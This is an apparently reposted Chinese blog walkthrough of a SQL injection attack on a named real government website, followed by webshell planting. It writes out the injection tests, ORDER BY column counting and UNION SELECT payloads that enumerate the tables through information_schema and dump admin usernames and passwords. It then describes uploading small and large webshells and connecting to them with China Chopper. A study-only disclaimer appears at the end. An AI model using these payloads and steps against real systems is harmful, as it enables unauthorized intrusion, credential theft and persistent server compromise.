當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

一次完整较为渗透过程

發布時間：2023/12/10 编程问答 28 豆豆

生活随笔收集整理的這篇文章主要介紹了一次完整较为渗透过程小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

步驟一：

利用阿D瀏覽器通過https：//s.bt.gg? 注入關鍵字掃描發現注入點：

http://www.rqyl.gov.cn/*****.php?ID=153 用啊D跑不出賬號密碼?

步驟二：

手工注入http://www.rqyl.gov.cn/*****.php?ID=153 and 1=1 、and1=2出錯

猜字段http://www.rqyl.gov.cn/*****.php?ID=153?? order by 17

查詢錯段?

www.rqyl.gov.cn/*****.php?ID=-153 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

version() 查詢數據庫版本

user() 查詢當前用戶

database（）查看數據庫名

@@version_compile_os 查看服務器系統

www.rqyl.gov.cn/*****.php?ID=-153 UNION SELECT 1,user(),3,4,database(),6,7,8,9,10,11,12,13,14,15,16,17

爆出數據庫中所有表：

www.rqyl.gov.cn/*****.php?ID=-153 ?UNION SELECT 1, group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17? ?

from information_schema.tables where table_schema=0x67313838343638---數據庫轉為十六進制

爆出admin里面的內容：

www.rqyl.gov.cn/*****.php?ID=-153? UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

from information_schema.columns where table_name =0x61646D696E

www.rqyl.gov.cn/*****.php?ID=-153? UNION SELECT 1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17?? from admin

用工具找后臺登陸? 上傳小馬找到小馬的上傳地址? 用菜刀連接

在存放網頁文件php 處新建文件? 把大馬考進來

聲明：本文章僅供學習參考，不得對目標站點進行攻擊，否則后果自負，與本人無關！

轉載于:https://www.cnblogs.com/kanghongsec/p/4796320.html

以上是生活随笔為你收集整理的一次完整较为渗透过程的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。